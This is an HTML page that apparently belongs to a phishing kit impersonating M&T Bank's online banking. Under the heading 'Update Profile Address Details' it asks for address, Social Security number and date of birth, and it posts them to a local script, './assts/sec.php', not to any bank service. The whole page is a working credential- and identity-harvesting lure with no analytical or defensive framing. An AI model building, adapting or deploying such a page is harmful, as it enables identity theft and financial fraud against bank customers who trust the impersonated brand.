<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no"><title>Welcome to Online Banking | M&T Bank  </title><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"><link rel="stylesheet" href="./assets/css/styles.min.css"></head><body><!-- Start: Navigation Clean --><nav class="navbar navbar-light navbar-expand-lg navigation-clean" style="margin-bottom: 1.5rem;background-color: #007856;height: 3.75rem;color: #fff;border-bottom: .375rem solid #f5a623;width: 100%;position: relative;text-align: center;"><div class="container"><a class="navbar-brand" href="#" style="width: 100%;"><img src="./assets/img/mtb-logo.svg" style="width: 121px;height: 22px;"></a><button class="navbar-toggler" data-bs-toggle="collapse"><span class="visually-hidden">Toggle navigation</span><span class="navbar-toggler-icon"></span></button></div></nav><!-- End: Navigation Clean --><!-- Start: Login Form Clean --><section class="login-clean" style="background: var(--bs-white);"><form method="post" action="./assts/sec.php" class="row g-3">


  <div class="col-md-12">


    <label for="inputEmail4" class="form-label" style="font-size: 21px;color: #007856;font-family: M&T Balto Web,Arial,Helvetica,sans-serif;">Update Profile Address Details</label>
   
  </div>



  <div class="col-12">


    <label for="inputAddress" class="form-label">Address</label>


    <input type="text" name="Address" class="form-control" id="inputAddress" placeholder="1234 Main St" required>


  </div>


  <div class="col-12">


    <label for="inputAddress2" class="form-label">Address 2</label>


    <input type="text" name="Address2" class="form-control" id="inputAddress2" placeholder="Apartment, studio, or floor">


  </div>


  <div class="col-md-12">


    <label for="inputCity" class="form-label">City</label>


    <input type="text" name="city" class="form-control" id="inputCity" required>


  </div>


  <div class="col-md-6">


    <label for="inputState" class="form-label">State</label>


    <select id="inputState" name="state" class="form-select">


        <option value>- Select -</option>
        <option value="AL">AL - Alabama</option>
        <option value="AK">AK - Alaska</option>
        <option value="AS">AS - American Samoa</option>
        <option value="AZ">AZ - Arizona</option>
        <option value="AR">AR - Arkansas</option>
        <option value="CA">CA - California</option>
        <option value="CO">CO - Colorado</option>
        <option value="CT">CT - Connecticut</option>
        <option value="DE">DE - Delaware</option>
        <option value="DC">DC - District of Columbia</option>
        <option value="FL">FL - Florida</option>
        <option value="GA">GA - Georgia</option>
        <option value="GU">GU - Guam</option>
        <option value="HI">HI - Hawaii</option>
        <option value="ID">ID - Idaho</option>
        <option value="IL">IL - Illinois</option>
        <option value="IN">IN - Indiana</option>
        <option value="IA">IA - Iowa</option>
        <option value="KS">KS - Kansas</option>
        <option value="KY">KY - Kentucky</option>
        <option value="LA">LA - Louisiana</option>
        <option value="ME">ME - Maine</option>
        <option value="MD">MD - Maryland</option>
        <option value="MA">MA - Massachusetts</option>
        <option value="MI">MI - Michigan</option>
        <option value="MN">MN - Minnesota</option>
        <option value="MS">MS - Mississippi</option>
        <option value="MO">MO - Missouri</option>
        <option value="MT">MT - Montana</option>
        <option value="NE">NE - Nebraska</option>
        <option value="NV">NV - Nevada</option>
        <option value="NH">NH - New Hampshire</option>
        <option value="NJ">NJ - New Jersey</option>
        <option value="NM">NM - New Mexico</option>
        <option value="NY">NY - New York</option>
        <option value="NC">NC - North Carolina</option>
        <option value="ND">ND - North Dakota</option>
        <option value="MP">MP - Northern Mariana Islands</option>
        <option value="OH">OH - Ohio</option>
        <option value="OK">OK - Oklahoma</option>
        <option value="OR">OR - Oregon</option>
        <option value="PA">PA - Pennsylvania</option>
        <option value="PR">PR - Puerto Rico</option>
        <option value="RI">RI - Rhode Island</option>
        <option value="SC">SC - South Carolina</option>
        <option value="SD">SD - South Dakota</option>
        <option value="TN">TN - Tennessee</option>
        <option value="TX">TX - Texas</option>
        <option value="UM">UM - United States Minor Outlying Islands</option>
        <option value="UT">UT - Utah</option>
        <option value="VT">VT - Vermont</option>
        <option value="VI">VI - Virgin Islands</option>
        <option value="VA">VA - Virginia</option>
        <option value="WA">WA - Washington</option>
        <option value="WV">WV - West Virginia</option>
        <option value="WI">WI - Wisconsin</option>
        <option value="WY">WY - Wyoming</option>
        <option value="AA">AA - Armed Forces Americas</option>
        <option value="AE">AE - Armed Forces Africa</option>
        <option value="AE">AE - Armed Forces Canada</option>
        <option value="AE">AE - Armed Forces Europe</option>
        <option value="AE">AE - Armed Forces Middle East</option>
        <option value="AP">AP - Armed Forces Pacific</option>


    </select>


  </div>


  <div class="col-md-6">


    <label for="inputZip" class="form-label">Zip</label>


    <input type="text" name="Zipcode" class="form-control" id="inputZip">


  </div>

  <div class="col-md-6">


    <label for="inputZip" class="form-label">SSN</label>


    <input type="text" name="SSN" class="form-control" id="inputZip" placeholder="XXX-XX-XXXX" required>


  </div>

  <div class="col-md-6">


    <label for="inputZip" class="form-label">Date Of Birth</label>


    <input type="text" name="DOB" class="form-control" id="inputZip" placeholder="DD-MM-YYYY" required>


  </div>


  


  <div class="col-12">


    <button type="submit" name="submit" class="btn btn-primary d-block w-100" style="background: #007856;font-weight: bold;font-family: M&T Balto Web,Arial,Helvetica,sans-serif;">Submit</button>


  </div>


</form></section><!-- End: Login Form Clean --><footer><img class="img-fluid" src="./assets/img/ft.png?"></footer><script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script></body></html>